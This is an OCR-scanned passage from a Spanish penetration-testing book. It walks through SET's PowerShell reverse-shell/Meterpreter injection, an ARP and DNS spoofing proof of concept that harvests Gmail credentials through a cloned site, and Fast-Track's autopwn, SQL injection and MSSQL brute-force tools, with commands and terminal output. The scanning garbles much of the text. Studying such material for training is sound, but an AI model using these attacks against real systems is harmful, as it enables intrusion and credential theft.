1) Powershell Alphanumeric Sheilcode Injector 
2) Powershell Reverse Shell 

3) Powershell Bind Shell 

4) Powershell Dump БАМ Database 


Return to Main Menu 


99) 


Fig 6.30: Menú con las posibilidades del vector de ataque de PowerShell 


Algunos de los más interesantes son el de dumpeo del fichero SAM, la сиа es la opción número 
cuatro, o la shell inversa que proporciona una shell, creando previamente un listener en la máquina 
del atacante. Este listener será creado con el handler exploit/multi/handler por ejemplo. 


PowerShell es la línea de comandos que viene por defecto en sistemas operativos Microsoft Windows 


desde la versión Vista. El atacante debe buscar el método o vía para conseguir que la víctima ejecute 
dicho script, 


PoC: Inyección de Meterpreter a través de PowerShell 

En este escenario se proponen dos vías de explotación. La primera vía es que el atacante dispone de 
acceso físico a la máquina en la que se quiere realizar la explotación, y posee un script encodeado 
con el que, tras ejecutar una PowerShell se realizará la subida de un Meterpreter a la máquina 
víctima. La segunda vía propuesta es que el atacante engañe a la víctima, mediante ingeniería social, 
para que ejecute el script. | 


1) Powershell Alphanumeric Shellcode Injector 
2) Powershell Reverse Shell 

3) Powershell Bind Shell 

4) Powershell Dump SAM Database 


99) Return to Main Menu 


5et:powershell>1 
set> IP address for the payload listener: 192,168.1.38 


l*] Prepping the payload for delivery and injecting alphanumeric shellcode... 
Enter the port number for the reverse [443]: 4444 

|*] Generating x64-based powershell injection code... 

[*] Generating x86-based powershell injection code... 

l=| Finished generating powershell injection attack and is encoded to bypass exe 
cution restriction... ; È 
set> Do you want to start the listener now [yes/no]: : yes 
set:powershell> Select x86 or x64 victim machine [default: x54]: 


Fig 6.31: Generación del script para la inyección en sistemas Windows 


En primer lugar se utilizará la opción número uno de este vector de ataque denominada “PowerShell 
Alphanumeric Shellcode Injector”. Se puede generar para sistemas de 32 o 64 bits. Al finalizar este 
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proceso se crea un archivo TXT en la ruta ¿pentest/exploits/set/reports, el código generado en ej 
fichero es el que se debe ejecutar en la máquina víctima. Se puede convertir este TXT en un Script y 
directamente copiar el código en una PowerShell y ejecutarlo. . 


Una vez que se ejecute el script en la máquina víctima, el handler que se configura automáticamente 
recibirá la sesión de Meterpreter otorgando el control de la máquina remota al atacante. En este punto 
se podrían ulilizar todas las opciones estudiadas en el capitulo de Meterpreter y post-explotución. 


. -- ____ _—_.———_——- 


asf exploit(handle 
[+] Started reverse handler on 8.0.0.9;4444 

[*] Starting the payload handler... 

[+] Sending stage (951296 bytes) to 192.168,1.37 

[+] Meterpreter session 1 opened (192,168.1.38:4444 -> 192,168.1.37:49299) at 2012-09-22 


2 -0408 
msf exploit(handler) > sessions -i 


Active sessions 


rt tt ql шл 


Id Type Information | Connection 


‚+ TARS ра. AAN Е 


1 meterpreter x64/win64 pablo-vmipablo @ РАВ10-УМ 192.168.1.38:4444 -> 192.168.1.37:49299 
(192.168.1,37) 


msí exploit(handler) > 


Fig 6.32 Recepción de la sesión de Meterpreter tras la ejecución del serip de PowerShell 


Actualmente este método es uno de los más favorables para evitar a los sistemas antivirus, debido a 
que el código va encodeado y es una vía muy novedosa. En la imagen se puede visualizar el aspecto 
que tiene el script generado y los parámetros necesarios, los cuales son generados también por SET, 
para su ejecución. 


Windows PaverShé lt”. 
pyright: <6> :2089 


Misevsipablo> р 
EAGOANABIAGDACA BLAN 
UACARSORUAHOAVABGAHTATAB 
kARCAVUBpANOAZOASACAACOBPAGIA 
PADSALUBEAGUARARIAGOACABOURHIAd 


MAGUAC9BUACAASQBUAHOAVABBANI 
iAHUAAABIAHMAL: Вийна 


Fig 6.33: Ejecución del ataque en una sesión de PowerShell 


, 


13. PoC: El mundo del spoofing y SET 


En esta prueba de concepto se presenta un escenario, fácilmente reproducible en cualquier empresa, 
en un ámbito de red de área local. El ataque consiste en el uso de técnicas como ARP spoofing y 
DNS spoofing para controlar, tanto el tráfico de la víctima сото los sitios web a los que ésta accede, 
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El escenario está compuesto por las siguientes máquinas у roles; 


- Еп primer lugar, el atacante dispone de una BackTrack 5 con la que ejecutará la aplicación 
arpspoof para realizar un ataque Man Їп The Middle a la víctima. 


- Б usuario víctima, el cual se encuentra en la misma red local que еї atacante, utiliza una 
máquina Windows 7. | 


Como ве ha mencionado anteriormente, primero hay que conseguir que la víctima crea que el router 
es el atacante, es decir, cuando realice peticiones a Internet, éstas se envien primero a la máquina 
del atacante, Para lograr esto se utiliza la herramienta arpspoof con la que se consigue envenenar la 
tabla ARP de la máquina víctima. 


La sintaxis de arpspoof es sencilla, se debe indicar la interfaz por la que se enviaron los arp reply y 
los target, Un ejemplo es arpspoof —i eth0 —t <máquina victima> <router>, puede interesar oblener 
un envenenamiento doble ejecutando en otra shell la instrucción arpspoof —i ethO —1 <router> 
<máquina victima>. 


root@bt:-# arpspoof -i ее -t 192.168.1.37 192.168.1.1 | 
8:0:27:05:8с:35 8:8:27:1d:be:5a 0806 42: агр reply 192.168.1.1 is-at 8:0:27:d5:80:35 
8:9:27:05:8с:35 8:0:27:1d:be:5a 0806 42: агр reply 192,168.1.1 is-at 8:9:27:05:8с:35 
8 :0:27:1d:be:5a 0806 42: агр reply 192.168.1.1 is-at 8:0:27:d5:8c:35 
8:0:27:d 
8:0:27:d 


5 
8:0:27:1d:be:5a 8806 42: агр reply 
8:6 1 


27:1d:be:5a 0896 42: 


» 
. 
М 


агр ге 


Fig 6.34: Envenenamiento de la máquina víctima 


No hay que olvidar que para que una máquina Linux trabaje como enrutador se debe modificar el 
fichero /proc/sys/net/ipv4/ip forward, cambiando su valor de 0 a 1. De este modo se consi gue que el 
tráfico que no es dirigido a la máquina del atacante se enrute hacia el exterior. En este instante todo 
el tráfico generado por la víctima pasa por la máquina del atacante, por ejemplo si se abre Wireskark 
u otro analizador de tráfico se podría visualizar este hecho, e incluso obtener información sensible, 
como pedrían ser las credenciales de un login. 


La víctima quiere unas credenciales en concreto, para ello se requiere controlar las páginas web 
y veracidad de éstas que la víctima visita. Se utilizará la técnica de DNS Spoofing para conseguir 
que cuando, por ejemplo la víctima intente entrar en Gmail, ia dirección ТР que se le entregue sea 
realmente la de la máquina del atacante, 

Para esta técnica se utiliza la herramienta dnsspoof, la cual necesita de un archivo donde se 
especifique la dirección ЇР que se otorgará a la víctima cuando pregunte por un dominio concreto, 
Lo primero que se debe crear es un archivo, similar al típico hosts: 

Dirección ІР Dominio solicitado 

192.168.1.40 gmail.com 


192.168.1.40 informatica64.com 
192.168.1.40  flu-project.com 


En el fichero anterior, el cual en el ejemplo se denominará hosts, se especifica una lista con dos 
campos. El primer campo indica la dirección IP que se entregará a la víctima cuando pregunte por el 


н а а 
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| Í 
dominio que se encuentra en el campo de la derecha, Para arrancar la herramienta dnsspoof se debe 
1 


ejecutar la siguiente instrucción dnsspoof—i eth0 -f <ruta fichero creado>. 


rovtGht:/pentest/exploits/setR cd - 

rootGbt:-+ nano hosts 
rootabt:-+* dosspoof -i etha -f hosts 

ánsspoof: listening on ethë [udp dst port 53 and not src 192.168.1.40] 


me ora 


Fig 6.35: Ejecución de dnsspoof en la máquina del atacante 


Ahora hay que esperar que la máquina víctima realice una petición DNS preguntando por la, 
dirección gmail.com. Cuando esto suceda la petición llegará antes a la máquina del atacante, 
gracias al envenenamiento АКР. La herramienta dsnspoof se encargará de falsear la respuesta con la 
información que se ha detallado en el fichero de texto, en la imagen el fichero hosts. 


Por último, el atacante configura en su máquina, con ayuda de SET, una página web clonada del sitio" 
gmail.com. De este modo, cuando la víctima pregunte a su DNS por la dirección ТР de gmail.com, 
dicha petición será interceptada y falseada, proporcionando una dirección 1P falsa. El navegador de 
la víctima realizará una conexión realmente con la máquina del atacante, donde se encontrará una 
página web clonada de Gmail. Cuando la víctima inserte credenciales, éstas serán capturadas por. 
SET. | 


En SET se elegirá la opción “Website Attack Vectors” con la que se creará el sitio web falso. Al 
utilizar la opción “Credential Harvester Attack Method” se recolectarán las credenciales que la 
víctima introduzca en dicho sitio web. Además, no se utilizará la plantilla de Gmail ya que se 
encuentra desactualizada, se elegirá la opción de clonación de sitio. Tras clonar el sitio web de 
Gmail, ya se tiene preparado el sitio web falso. 5 


Cuando la víctima introduzca en su navegador el dominio gmail.com realmente estará accediendo a 
la página web que ofrece la máquina atacante. Como se puede observar el sitio web es una clonación 
casi perfecta del sitio web original. La víctima introducirá sus credenciales y será reenviada al sitio 
web real, por lo que по'ѕе levantará gran sospecha sobre dicha acción. 
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Fig 6.36: Navegador de la victima accediendo al sitio web falso 
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Por último, hay que recalcar lo que mostró la herramienta dnsspoof cuando modificó las peticiones 
realizadas para resolver el nombre de dominio gmail.com. En la imagen se puede visualizar como se 
spoofea la petición. También cabe destacar que si la máquina víctima hubiese cacheado la resolución 
de gmail.com el ataque no tendría éxito, pero generalmente, en algún momento esa caché se vacía, 
ya sea porque la máquina se apaga, o porque ha pasado una cantidad de tiempo considerable. 


rootabt:-4* nano hosts -` 

rootgabt:-4* dnsspoof -i eth -f hosts 

ánsspoof: listening on ethe [иар dst port 53 and not src 192,168.1.48] 
192,168.1.37.56003 > 88.58.61,254.53: 45733+ A? gmail.com 


192.168.1.37.65375 > 89,58.61.254.53: 25943+ А? gmail.com 
192,168.1.37.52069 > 89.58.61,254.53: 58934+ A? gmail.com 


Fig 6.37: Modificaciones de dnsspoof a las peliciones DNS originales 
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Capítulo УП 
Más allá con Fast-Track 


1. ¿Qué es y para qué sirve? 


А estas alturas del libro se debe comprender que la automatización en un lest de intrusión ayuda, 
y mucho, a realizar la parte procedimental de éste. Con esta idea apareció Fast-Track, un script de 
Python, el cual permite al usuario configurar de manera sencilla distintos tipos de ataque que pueden 
resultar complejos. Fust-Track utiliza a Metasploit framework para la adición de características, 
entre las que se encuentran inyecciones SQL, ataques mediante el uso de exploits o ataques de tipo 
client-side. | | 


Fast-Track dispone de distintos métodos de interacción con la herramienta: 
- El modo interactivo. 
- Е modo de línea de comandos. YE 


_- modo web, 


ЕІ modo de línea de comandos es parecido а la interfaz de Metasploit msfeli. Por otro lado, el modo 
web permite obtener un entorno gráfico, a través de la utilización de una interfaz intuitiva y sencilla. 


El objetivo de Fast-Track es el de facilitar la interacción del usuario con el framework de Metasploit. 
Hay que diferenciar, que Fast-Track tiene un fin similar al que proporcionaba SET en la ingeniería 
social y el uso de Metasploit para obtener privilegios. En algunas ocasiones, muchos usuarios 
definen a SET y Fast-Track como sistemas independientes, pero en realidad, el fin de estos es 
utilizar una interfaz que gestione los recursos que ofrece Metasploit de manera sencilla e intuitiva 
para aprovecharlos en una rama concreta de la seguridad informática, 


2. Fast-Track y sus posibles ejecuciones 


Como se ha mencionado anteriormente Fast-Track proporciona distintas vías para la interacción con 
. . А . ‚ t А 2 

éste. Este hecho proporciona comodidad al usuario para poder elegir la vía con Іа, ие se encuentre 

más cómodo trabajando, | 
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FAA oO EARL ANITA TIERRA TEVE ҮҮ 
+4 жж 
++ Fast-Track - А new beginning... +3 
** Version: 4.0.2 ++ 


Es realmente interesante conocer estas vías de interacción con la herramienta, ya que, además de 
la comodidad que proporcionan, proponen mayor automatización y vías para cargar un entorno о 
vector de ataque de manera más rápida de lo habitual, 


, q ГА И ' .r Д ? A +E j Ы { 
Durante el desarrollo de este capítulo se utilizará una distribución de GNU/Linux como es BackTrack A o al е a ы + 
; Jata ЕНИ E ; p ait staj үз]; ead Developer: Joey Furr {]®Тег ** | 
5 y ; ; 2 - а /pentest/exploits/fastirack. : 
5 КЗ. Esta distribución proporciona la herramienta Fast-Track en la ruta / ploits/fe he A кой кй 
. . Й e r de ж 
La línea de comandos vueive a ser fundamental en este tipo de herramientas, pero la Interfaz gráfica Л Т ТААК ROO 


mediante el uso de un servidor web proporciona aire fresco y facilidad de aprendizaje para el usuario 


de Fast-Track. ast-Track Main Menu: 


1. Fast-Track Updates 
rootQht:/pentest/exploits/fasttrack* python fast-track.py 2. Autopwn Automation 
i 3, Nmap Scripting Engine 
| 4. Microsoft SQL Tools 
o 3. Mass Client-Side Attack 
Fast-Track - A new beginning... | 6. Exploits 
Automated Penetration Testing . E e сори тее 
8. Payload Generator 
Written by David Kennedy (ReL1K) 2. Fast-Track Tutorials 
; 1@. Fast-Track Changelog 
е read the README and LICENSE before using о. Fast-Track Credits 
this tool for acceptable use and modifications. | 12, Exit Fast-Track 
O A e dia į Enter the number: 
iModes 


Fig 7.02: Lanzamiento de Fast-Track en modo interactivo, 


¡Interactive Menu Driven Моде: -1 
Ісоттап Line Mode: -c 
сБ GUI Mode -g 


Como se ha mencionado у como se puede visualizar en la imagen, Fast-Track en modo interactive 
proporciona menús. Estas opciones se pueden agrupar por temáticas, las cuales se enuncian a 
Examples: ./fast-track.py -i continuación: | 
.¿ast-track.py -€ 
.¿Tast-track.py -9 
./fast-track.py -g <рагїпий> 


- Tutoriales. El propio entorno de Fast-Track proporciona tutoriales para que el usuario 


і 
pueda utilizar la herramienta de manera sencilla. 


- Actualización del entorno. Se puede ejecutar la actualización de Fast-Track de manera 
automatizada, con to que se consigue mantener actualizado el entorno de una manera sencilla. 


A A ааа ат тта ct 


Usage: ./fast-track.py «<mode> 
AO IE E а ы мыр эзш 
Fig 7.01: Modos de ejecución de Fast-Track. 
| - Herramientas para manipulación y gestión de payloads. Se dispone de la posibilidad de 
utilizar Fast-Track para generar payloads, e incluso poder convertir los payload de binario 


Fast-Track interactivo a hexadecimal. 


liste modo es el más conocido por todos los usuarios de Metasploit y Fast-Track. Proporciona un | - Ataques SQL. Las inyecciones SOL despiertan cierta admiración en el mundo de la 
menú similar al de SET con el que el usuario sólo debe ir navegando a través de distintos menús. seguridad informática, y Fast-Track proporciona mecanismos para automatizar el proceso de 
Esta opción proporciona facilidad de uso para usuarios no expertos en el uso de Metasploit en su ataques a las bases de datos SQL, 


modo msfconsole, уа que proporciona ciertos ataques conocidos que se pueden ir configurando de га | | ДЕ | | 
у ‚ уа que prop 9 q р 8 - Ejecución de Nmap mediante scripting. Los scripts de Nmap ayudan a detectar 


manera trivial a través de 105 distintos menús. ora bil: MOE ; 
| Г | vulnerabilidades a través de escaneos con esta herramienta. Estos scripts aportan funcionalidad 
extra а una de las herramientas de fingerprint más famosas en el mundo de la seguridad 


Para ejecutar Fast-Track con este modo se debe lanzar la siguiente instrucción python <ruta fast- т 
Informática, 


track.py> -i, es decir, se debe indicar el parámetro /. 
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- Automatización con autopwn. Como se ha estudiado en este libro autopwn proporciona 
técnicas para automatizar el proceso de exploiting en sistemas, Fast-Track permite automatizar 
el proceso de configuración de autopwn. 


- Posibilidad de automatizar la preparación de un ataque masivo соп la técnica Client-Side. 
3sta técnica se ha observado en el libro en numerosas ocasiones, colocando el peso del ataque 
en la parte del cliente. El ataque se realizará, comúnmente, sobre el navegador del usuario, y 
вс necesita que éste realice alguna acción. 

- — Exploits. Se ofrece un listado de exploits que pueden ser lanzados sobre un objetivo. El 
proceso de ejecución de estos exploits es totalmente guiado por Fast-Track. 


Fast-Track línea de comandos 

La línea de comandos que proporciona Fast-Track es una de las más curiosas maneras de interactuar 
con la herramienta, Para ejecutar este modo se debe lanzar la siguiente instrucción рулон <rula 
fust-track.py> -c, donde с es el parámetro que indica el modo command line. 


Como se puede visualizar en la imagen la ejecución de Fast-Track con el parámetro c proporciona 
una salida en la que se puede observar el menú principal, el cual se visualizaba соп el modo 
interactivo comentado anteriormente. 


La forma de interactuar con Fast-Track en este modo es realmente curioso, se debe indicar en la 
misma instrucción el número de la opción que se quiere seleccionar, por ejemplo, si el usuario sabe 
que quiere ejecutar la opción de exploits, la cual es la opción número seis, se debería ejecutar python 
<ruta fast-track.py> -c 6. Como se puede visualizar en la imagen, se auto ejecuta la opción 6, la cual 
proporciona un nuevo menú. | 


Payloads: 


. Meterpreter Reverse TCP Shell 

‚ Generic Bind Shell 

‚ Meterpreter Reverse VNC Inject (601) 
‚ Reverse ТСР Shell 


Lu М ке 


Also, 1 added an ettercap option, if you have ettercap installed then specify a 
1 flag at the end of the usage to use ettercap and poison a specific victin. 


Examples: ./fast-track.py -€ 6 127.0.8.1 1 1 
./fast-track.py -c 6 192.168.1.34 2 1 


Usage: ./fast-track.py -C 6 <ipaddr> (your main ip addy, і.е. eth0) <payload> <] for ettercap, € 
lse dont specify> 
1 


Specify your payload: 


1. Windows Meterpreter Reverse Meterpreter 

2. Generic Bind Shell 

3. Windows VNC Inject Reverse ТСР (aka "Da биі") 
4. Reverse TCP Shell 


Enter the number of the payload you want: 


Fig 7.03: Ejecución de Fast-Track modo consola. 
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Para ejecutar el nuevo menú que se puede observar, se deberá ejecutar la instrucción python <ruta 
Jasi-track.py> -c 6 1, sí se quiere configurar el exploit número uno. Se obtendrá un nuevo diálogo, 
al cual se debe contestar mediante el uso de la línea de comandos. Es por esta razón, que se requiere 
especificar toda la configuración a través de una instrucción de línea de comandos. 


¿Esto es realmente útil? La respuesta es si. Se puede utilizar en el uso de scripis realizados por el 
propio usuario, por ejemplo, para configurar la propia automatización de un proceso de seguridad 
concreto donde se pueden utilizar distintas vías que proporciona Fast-Track, 


Fast-Track vía web | 

Con este modo de interacción se utiliza el navegador web mediante una interfaz gráfica amistosa 
para presentar Fast-Track más cercano al usuario. Se ejecuta un servidor web que presenta un sitio 
web por el que se puede interactuar con el mismo menú que se presentaba en el modo interactivo. 


Dar ¡ Lar ar > y : r . . rg a 
Para ejecutar y configurar el тойо web se puede lanzar la siguiente instrucción pyrhon <ruta fast- 
track.py> -g. También se puede utilizar la instrucción python <ruta fast-track.py> -g <puerto>. 81 
no se indica el puerto, por defecto se ejecutará sobre el 44444, 


жокк уН КЕКЕ ЖКК КАК КЬ 


text Performing dependency checks... **+*+++ 
КЕТЕТ ЕСТ 


+*+ FreeTDS and PYMMSOL are installed. (Check) +++ 
24% PExpect is installed. (Check) +*+ | 

*** ClientForm is installed. (Check) *** 

*+* Beautiful Soup is installed. (Check) *** 


Also ensure ProFTP, WinEXE, and SQLite3 is installed from 
the Updates/Installation menu. 


Your system has all requirements needed to run Fast-Track! 


т күү к н Лл АД? 


Fast-Track Web GUI Front-End 


Written by: David Kennedy (Rel1K) 
Fallo obio 


Starting HTTP Server on 127.8.8.1 port 44444 


+*+ Open a browser and go to http://127.0,0.1:44444 *+% 


Type <control>-c to exit.. 


Fig 7.04: Configuración del sitio web para interactuar con Fast-Track. 


Una vez que se lanza el servidor se puede acceder a él a través de la dirección http://127.0.0.1:44444. 
Como se puede visualizar en la imagen el aspecto que ofrece este modo de interacción es bastante 
más agradable e intuitivo que la línea de comandos. La presentación gráfica de Fast-Track ayuda al 
usuario, ya que presenta en la parte izquierda el menú que se puede observar en el modo interactivo. 
El uso de los clics de ratón para navegar por Fast-Track amenizan el uso de la herramienta y 
proporciona ventajas adicionales, como por ejemplo que el uso de los tutoriales se pueda leer de 
manera más clara. | 
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Fig 7.05: Acceso a Fast-Track mediante el navegador web. 


3. Tutoriales en Fast-Track 


Los tutoriales que ofrece Fast-Track a través de cualquier modo de interacción con la herramienta 
proporcionan una ayuda muy interesante al usuario. En este apartado se utilizará el modo interactivo 
para ejemplificar el proceso de consulta de los tutoriales de la herramienta. 


Fast-Track Main Menu: 


1, Fast-Frack Updates 

2. Autopwa Automation 

3. Nmap Scripting Engine 
4. Microsoft SQL Tools 

5. Mass Client-Side Attack 

5. Exploits 

7. Binary to Hex Payload Converter 
8. Payload Generator 

9. Fast-Track Tutorials 

180. Fast-Track Changelog 

11. Fast-Track Credits 

12. Exit Fast-Track 


Enter the number: 9 


Fig 7.06: Elección de la opción de tutoriales. 
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En el menú principal de Fast-Track se puede observar una opción denominada атра 
Tutorials”. Esta opción presenta una nueva pantalla en la que se puede escoger el tutorial requeridé 
por el usuario, diferenciado por temáticas, 


[Fast-Track Tutorials Menu: 


General Functionality and Movement in Fast-Track 
| How to update Fast-Track 
MetaSploit AutoPwn 
SQL 1433 Hacking 
. SQL Injection HOWTO 
(qjuit 


FTP Brute Forcer 
Spawning a Shell 
Exploits 
Mass Cilent-Side Attacks 
« Binary to Hex Paylead Generator 


ч Tin Aa м ны 
М . e 


юе М сс 
Do. > v 


Enter number; 


Fig 7.07: Tutoriales disponibles en Fast-Track. 


Cuando el usuario selecciona una temática, ésta puede contener distintos tutoriales en relación a las 
distintas funcionalidades que el tutorial ofrece. Todo es realmente sencillo de manejar y seleccionar 
ya que los diferentes menús ayudan en Ja navegación por la distinta ayuda ofrecida por la herramienta. 


En el siguiente ejemplo se ha elegido la opción número cuatro, obteniendo la ayuda relacionada con 
la funcionalidad seleccionada. En Fast-Track se ha intentado dotar de la máxima ayuda posible con 
el mayor grado de detaile. e 


окне 
РЕТТҮҮ EESAN 


SQL 1433 Hacking: Requirements; РҮМ5501., FreeTos 
AA o anar INR Rolas 


Alright, lets first start off with those of you that are unfamilar with 
hacking port 1433. 1433 is Microsoft's default port installtion for 
М5501.. This goes fer any version of SQL, by default it installs on 1433 
and is used for primary means of community for SQL Servers. If a website 
uses а back-end database to store information, the web server actually 
taiks back to the SQL server via port 1433, 


The way Fast-Track attacks this specific port is through a "brute force" 
attack, or attempting to guess the initial password. When first installing 
a SQL server, the administrator is asked if they would like to use 
Integrated Windows Authentication, use SQL Authentication, or use Mixed 
Mode (a combination of both). Generally web applications are easy to use 
SQL authentication then mixed or integrated, 


Fig 7.08: Ayuda sobre una herramienta completa, 


4. Configuración de Fast-Track 


Fast-Track dispone de un fichero de configuración en la ruta /pentestlexploits/fasttraci/config 
denominado fasttrack_config. Este fichero es similar al estudiado en el capítulo de SET, es decir, 
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dispone de variables a las cuales se les asigna un valor. Estos valores son leídos por Fast-Track en 
el instante que arranca la aplicación, adquiriendo la información que proporcionan las variables del 
fichero. 


Por defecto, el fichero de configuración no tiene un peso o tamaño parecido al de SET, ya que en 
el fichero de configuración se puede encontrar poca información en comparación con el archivo 
de SET. En la imagen se puede visualizar como, por defecto en la versión R3 de la distribución 
BackTrack 5, simplemente se encuentra la variable donde se almacena Metasploit. 


———— 


rootabt:/pantest/exploits/fasttrack/configA cat fasttrack_config | 
AER IAE DRA DBA RIA DRA AAA RDA DRAE DRA RADA OIEA EREN 


#ННИНИНННННННННН 


г =) не 

Ё FAST-TRACK CONFIGURATION FILE, THIS IS VERY ВЕТА AND WILL BE ADDED UPON AS THE NEED GROWS, TH 
5 WAS TO МТС 

# THE CONFIG FILE SIMILAR TO THE SOCIAL-ENGINEER-TOOLKIT (SET). 

# И 
ЗНННННННННННВННННННЦННННННННННЦНННННННННННННЫНННННННННННННИННННННИННННННННИННННННННАННННННЕНЧНННЕ 
ВЗННИНЕНННННАНН 

# 

# CONFIG THE METASPOIT PATH HERE AND CHANGE IT TO WHATEVER YOU WANT 


HETASPLOTT_PATH=/pentest/exploits/framework/ 


rootúbt: /pentest/exploits/fasttrack/configk 


Fig 7.09: Fichero de configuración de Fast-Track. 


Existe otro fichero de configuración en la siguiente ruta /pentest/exploits/fasttrack/bin/config 
denominado config. Este fichero dispone de variables que cargará Fast-Track en su arranque para 
situar o mapear ciertos componentes que utilizará la herramienta o cargar algunos valores para ej 
comportamiento de la propia aplicación. 


5. Funcionalidades 


La herramienta proporciona gran diversidad de funcionalidades como se ha podido observar en 
apartados anteriores. La riqueza que ofrece Fast-Track reside en la versatilidad, sencillez y 
automatización que proporciona al usuario. 


En este apartado se presentan las distintas funcionalidades con mayor detalle. Es importante 
observar que algunas de ellas se han implementado en este libro de manera “artesanal”, es decir, 
manualmente. El principal objetivo de Fast-Track es conseguir que cualquier acción, que se puede 
realizar con la herramienta, quede configurada en un tiempo inferior a los tres minutos, tal y como 


expone su eslogan. 


Autopwn Automation | O 
Autopwn también está disponible en Fast-Track. El ataque conocido como “metralleta” permite 


realizar un ataque con gran cantidad de exploits en función de varias características, como por 
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ejemplo, la versión de un servicio que se ejecuta en la máquina remota, un sistema operativo 
concreto, etcétera. 


Esta funcionalidad permite realizar la técnica autopwn de manera rápida y sencilla, sin necesidad 
de manipular Metasploit. Además, permite ejecutar “comandos” de Nmap, como si se estuvieta en 
la línea de comandos de éste. La ayuda que se ofrece por pantalla acerca de la herramienta aporta 
facilidad para saber el formato de las entradas. 


Fast-Track Main Menu: 


Fast-Track Updates 
Autopwn Automation 
Наар Scripting Engine 
Microsoft SQL Tools 
Mass Client-Side Attack 
Exploits 
Binory to Hex Payload Converter 
Payload Generator 
Fast-Track Tutorials 

‚ Fast-Track Changelog 

. Fast-Track Credits 

. Exit Fast-Track 


1. 
2. 
3. 
4. 
5. 
8. 
7. 
8, 
9. 


Enter the number: 2 


Fig 7.10: Elección de Autopwn Automation. 


This tool specifically piggy backs some commands from the Metasploit 
Framework and does not modify. the Metasploit Framework in any way. This 

is simply to automate some tasks from the autopwn feature already developed 
by the Metasploit crew. 


Simple, enter the ІР ranges like you would in AMap i.e. 192.168,1.-254 
or 192,168,1,1/24 or whatever you want and it'll run ayainst those hosts, 
Additionally you can place NMAP commands within the autopwn ip ranges bar, 
for example, if you want to scan even if a host "appears down” just de 

-PH 192.108.1.1-254 or whatever...you can use all NMap syntaxes in the 
Autopwn ТР Ranges portion, ў 


then it has completed exploiting simply type this: 


sessions -1 (lists the shells spawned) 
sessions -i <id> (jumps you into the sessions) 


Example 1: -PN 192.158.1.1 
Example 2: 192.168.1.1-254 
Example 3; -P8 -v -A 192.168.1.1 
Example 4; 192.168.1.1/24 


Enter the ІР ranges to autopwa or (q)uit FastTrack: 


Fig 7.11: Ejecución de orden en птар. 


En este pequeño ejemplo se utilizará un escaneo estándar sobre la dirección ІР 192.168.0.66, en la 
que se encuentra un equipo cliente con sistema operativo Microsofi Windows XP 53. Cabe destacar 
que se puede ejecutar un escaneo sobre un rango o con otros valores que no sean los de por delecto, 
para mayor detalle se puede consultar el apartado de Nmap en el capítulo 2. 


Una vez configurado sobre qué máquinas o qué máquina se realizará el escaneo se debe configurar 
el modo de conexión entre el exploit que produzca la explotación y el atacante. En este ejemplo se 
configura el modo inverso, 
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Do you want to do a bind or reverse paylead? | 


Bind = direct connection to the server 
Reverse = connection originates from server 


1. Bind 
2. Reverse 


Enter_number: 2 
Fig 7.12; Elección del método de conexión cuando se explote una máquina mediante autopwn. 


Tras realizar dicha acción se creará una base de datos y se auto configurará Metasploit. Si se obluviese 
el control de una máquina se dispondría de una sesión inversa. En este caso se puede.observar que 
no se tiene que configurar ninguna acción en la base de datos ni en Metasploit, lo cual ayuda a los 
usuarios con menos destreza en el uso del framework. El payload que se introduce en la máquina 
remota será uno de tipo Meterpreter. | 


Nmap Scripting Engine 
Nmap dispone de una funcionalidad que aporta gran riqueza y flexibilidad a la herramienta 
denominada Nmap Scripting Engine. Con dicha funcionalidad el usuario puede crear sus scripts 


para ser ejecutados por Nmap o utilizar los miles de scripts que existen de Nmap que aportan nuevas 


e interesantes funcionalidades. 


Fast-Track dispone, en su opción tres del menú principal, de la posibilidad de utilizar seripts 
relacionados con el protocolo SMB. Algunas de las funcionalidades extra que se pueden obtener con 
la ejecución de estos scripts, y que incluso la propia herramienta Nmap ha incluido en sus últimas 
versiones son las siguientes: 


- Descubrimiento de red. 
- Detección de servicios y versiones mejorada. 
- Explotación y detección de vulnerabilidades. 


- Averiguar y corroborar la existencia de malware. 


Microsoft SOL Tools | 

Esta funcionalidad proporciona distintas herramientas para realizar acciones como inyecciones SQL, 
procesos de fuerza bruta sobre servidores de bases de datos, etcétera. Esta es una de las partes que 
más puede interesar a algunos auditores ya que, aunque ya son muy conocidas, las vulnerabilidades 
SQL copan los primeros puestos en vulnerabilidades a nivel mundial. 


La herramienta MSSOL Injector permite al usuario realizar inyecciones mediante distintos métodos. 
En general, se debe especificar el párámetro que contenga la vulnerabilidad SQL. Se puede 
visualizar como en algunos métodos se debe utilizar la palabra INJECTHERE para especificar 
donde la herramienta debe realizar la inyección. Un ejemplo sería htip://sitioVulnerable.com? 
recurso.aspx?id="INJECTHERE. “ 
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Enter which SQL Injector you want to use: 


1. SQL Injector - Query String Parameter Attack 

2. SQL Injector - POST Parameter Attack 

3. SQL Injector - GET FTP Payload Attack 

4. SQL Injector - GET Manual Setup Binary Payload Attack 


(qhuit 


| Enter your choice: 


Fig 7.13: Menú de SOL Injector. 


La herramienta MSSOL Bruter proporciona una aplicación para realizar fuerza bruta sobre un SQL 
Server, También se puede utilizar como herramienta de escaneo para realizar fingerprinting de la 
máquina remota buscando puertos abiertos para la base de datos, visibilidad con la máquina, etcétera. 


_—— 


pe the IP Address and Port Number to Attack. 


Options: (a)ttempt 501 Ping and Auto Quick Brute Force 
(m)ass scan and dictionary brute 
(s)ingle Target (Attack a Single Target with big dictionary) 
(f) ind SAL Ports (SQL Ping) 
(1) want a command prompt and know which system is vulnerable 
(v)inerable system, 1 want to add a local admin on the box... 
(гјам SQL commands to the SQL Server 
(e)nable xp_cmdshell if its disabled (sgl2k and sgl2k5) 
(h)ost list file of ІР addresses you want to attack 


(q)uit 


Enter Option: 


Fig 7.14: Menú de SOL Bruter: 


La última herramienta sobre inyecciones SQL la proporciona SOLPwnage, con esta herramienta: 
se puede especificar un sitio web y mediante un proceso de crawling se obtiene un mapa con las. 
variables y páginas del sitio. De este modo se puede realizar un ataque de inyección SQL a través. 
de este descubrimiento. 


SoLPwnage is a mass pwnage tool custom coded for Fast-Track. SQLPwnage will attempt 
to identify SQL Injection in a website, scan subnet ranges for web servers, crawl entire 
sites, tuzz form parameters and attempt to gain you remote access to а system. We use 
unique attacks never performed before in order to bypass the 64kb debug restrictions 

on remote Windows systems and deploy our large payloads without restrictions. 


This is all done without a stager to download remote files, the only egress connections 
made are our final payload. Right now SQLPwnage supports three payloads, a reverse 
tcp shell, metasploit reverse tcp meterpreter, and metasploit reverse упс inject. 


Some additional features are, elevation to *sa" role if not added, data execution prevention 
(DEP) disabling, anti-virus bypassing, and much more! 


This tool is the only one of its kind, and is currently still in beta, 


SQLPwnage Main Menu: 


